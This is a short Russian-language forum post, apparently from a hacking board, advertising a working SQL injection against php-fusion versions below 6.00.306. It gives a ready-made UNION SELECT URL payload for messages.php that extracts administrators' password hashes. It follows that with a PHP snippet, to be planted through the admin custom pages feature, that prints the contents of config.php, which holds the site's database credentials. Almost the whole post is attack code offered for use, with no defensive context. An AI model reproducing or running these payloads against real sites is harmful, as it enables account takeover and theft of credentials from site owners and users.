
15.06.2006, 17:10
|
|
Новичок
Регистрация: 09.04.2005
Сообщений: 29
С нами:
11099185
Репутация:
17
|
|
SQL - инъекция в php-fusion < v6.00.306
работает отлично!
Код:
messages.php?folder=inbox&show=_&srch_where=+AND+1=1+UNION+SELECT+0%2C0%2C0%2Cuser_password%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0+FROM+fusion_users+WHERE+user_level%3D103%2F%2A
/administration/custom_pages.php
Код:
<?php
$DATA_FILE = "".BASEDIR."config.php";
$text = 100;
$names = file($DATA_FILE);
for ($i = count($names) - 1 - $for; $i >= count($names) - $for - $text; $i = $i - 1) {
if ($names[$i]) {
list ($name) = split ("\t", $names[$i]);
print "$name<br>";
}
}
?>
короткое video тут

Последний раз редактировалось liauliau; 15.06.2006 в 18:11..
|
|
|